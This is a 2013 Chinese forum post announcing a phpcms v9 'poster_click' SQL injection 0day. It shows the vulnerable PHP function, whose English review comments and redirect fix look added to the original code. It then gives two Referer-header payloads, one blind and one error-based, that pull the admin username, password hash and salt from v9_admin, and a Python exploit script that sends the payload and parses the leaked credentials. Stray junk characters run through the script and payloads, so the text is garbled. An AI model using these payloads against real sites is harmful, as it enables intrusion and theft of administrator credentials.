

作者: admin    时间: 2013-1-11 21:01
标题: phpcms post_click注入0day利用代码
有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
问题函数: \phpcms\modules\poster\index.php

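/**
 * Record a click on the poster given by $_GET['id'] and redirect to its link.
 *
 * Reads $_GET['id'], $_GET['siteid'], $_GET['url'], the 'username' cookie,
 * the client IP (ip()) and the HTTP_REFERER constant; inserts one click row
 * into s_db and increments the poster's 'clicks' counter in db.
 *
 * NOTE(review): the post above reports that the 'referer' value (HTTP_REFERER)
 * reaches the INSERT unescaped. The s_db insert layer is not visible here, so
 * request-derived values ('referer', 'username') must be escaped or
 * parameterised by that layer — confirm there; this method passes them as-is.
 *
 * @return bool|void false when no poster row matches $id; otherwise a
 *                   Location header is sent and nothing is returned.
 */
public function poster_click() {
    $id = isset($_GET['id']) ? intval($_GET['id']) : 0;
    $r = $this->db->get_one(array('id' => $id));
    if (!is_array($r) && empty($r)) return false;

    $ip_area = pc_base::load_sys_class('ip_area');
    $ip = ip();
    $area = $ip_area->get($ip);
    // Cookie value: client-controlled, treat as untrusted input.
    $username = param::get_cookie('username') ? param::get_cookie('username') : '';

    if ($id) {
        $siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
        // 'referer' and 'username' come straight from the request; they are
        // not escaped here, so the insert layer must do it.
        $this->s_db->insert(array('siteid' => $siteid, 'pid' => $id, 'username' => $username, 'area' => $area, 'ip' => $ip, 'referer' => HTTP_REFERER, 'clicktime' => SYS_TIME, 'type' => 1));
    }
    $this->db->update(array('clicks' => '+=1'), array('id' => $id));

    $setting = string2array($r['setting']);
    // Default target: the first configured link (avoids a notice when the
    // stored setting has no entry '1').
    $url = isset($setting['1']['linkurl']) ? $setting['1']['linkurl'] : '';
    if (count($setting) != 1 && isset($_GET['url'])) {
        // Honour ?url= only when it is one of this poster's configured link
        // targets. Previously any value was echoed into the Location header,
        // i.e. an open redirect. Assumes every entry of $setting has the same
        // shape as $setting['1'] (an array with a 'linkurl' key) — confirm.
        foreach ($setting as $item) {
            if (is_array($item) && isset($item['linkurl']) && $item['linkurl'] === $_GET['url']) {
                $url = $_GET['url'];
                break;
            }
        }
    }
    header('Location: ' . $url);
}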

利用方式:
1、可以采用盲注入的手法:
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#5 s+ Z, P9 b- w/ F
通过返回页面,正常与否一个个猜解密码字段。
2、代码是花开写的,随手附上了:
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
此方法是报错注入手法,原理自查。

利用程序:
9 }0 f) N8 v  y; V#!/usr/bin/env python
$ Y8 Y4 K- J6 K. U5 Q  himport httplib,sys,re9 V% i: S7 m6 ?( T
$ b9 \- w1 s, u9 x$ _, [' Z* N
def attack():$ x( Y. p# o; p% ?  C9 n7 f
print “Code by Pax.Mac Team conqu3r!”2 ]. J+ r  @1 Q5 o; j3 ]8 v
print “Welcome to our zone!!!”9 [2 D1 ]% \8 ^0 o
url=sys.argv[1]
, T. H: ]  f6 R7 M4 j' Wpaths=sys.argv[2]
" l/ K' U+ i) _. F0 ~3 nconn = httplib.HTTPConnection(url)
1 l' |6 y" i  }: D0 D* G, B. zi_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,3 M! p( h  Q, R8 z9 r+ S! I
“Accept”: “text/plain”,
/ v; ]& B' O# A, d“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}! v! Y7 W9 [1 P2 w4 n9 X+ n
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)6 Y  S! M1 D2 R1 D" n
r1 = conn.getresponse()
6 m; N' v* a5 Odatas=r1.read()! d3 K) ?! Z0 o9 ]+ f
datas=re.findall(r”Duplicate entry \’\w+’”, datas)9 \0 K; a8 H6 i4 o' b5 Y$ L; z
print datas[0]+ Y6 y2 T, v1 ^9 j9 h
conn.close()
4 c# ]$ P3 X: r& L! O' uif __name__==”__main__”:
. V$ Y9 Q# H8 }+ _if len(sys.argv)<3:
3 {7 F5 f. j" h% `8 B1 Rprint “Code by Pax.Mac Team conqu3r”
) F) `9 \) Z$ N' ^) ?print “Usgae:”
. g: I  O. N7 @9 T% {! V* Iprint “    phpcmsattack.py   www.paxmac.org /”8 r7 {" v0 A8 P# v
print “    phpcmsataack.py   www.paxmac.org /phpcmsv9/”3 y. h1 ?& v. ]' G  j; ?7 L& Y) K
sys.exit(1)
* t" \" e- q8 ]4 o& I; @attack()7 U3 q5 C# x/ A# v




